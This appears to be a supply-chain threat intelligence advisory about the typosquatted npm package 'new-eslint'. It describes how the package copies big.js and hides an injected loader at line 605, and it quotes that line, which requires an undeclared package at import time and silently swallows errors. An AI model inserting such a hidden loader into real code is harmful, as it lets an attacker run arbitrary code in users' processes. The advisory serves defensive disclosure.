Supply-chain threat intelligence

Incident detail

critical · npm · typosquatting · osv

Malicious code in new-eslint (npm)

new-eslint

Risk score

92

AI summary

Indexed incident for new-eslint (npm).

Description

The package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js with a hidden loader injected mid-file, between P.minus and P.mod, at both big.js:605 and big.mjs:605: const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. This require fires whenever a consumer imports or requires the package, and the empty catch silently swallows every error. The required package ts-eslint-helper is not declared in package.json (the manifest lists a different package, eslint-helper@4.0.1), so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: a classic typosquat lure combined with a hidden, remotely controlled loader. Whatever ts-eslint-helper.from_str() does runs in the consumer's process at import time, with no advertised functionality to justify it.

Technical details

Affected versions

=7.0.5

Indicators

  • affected version = 7.0.5 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
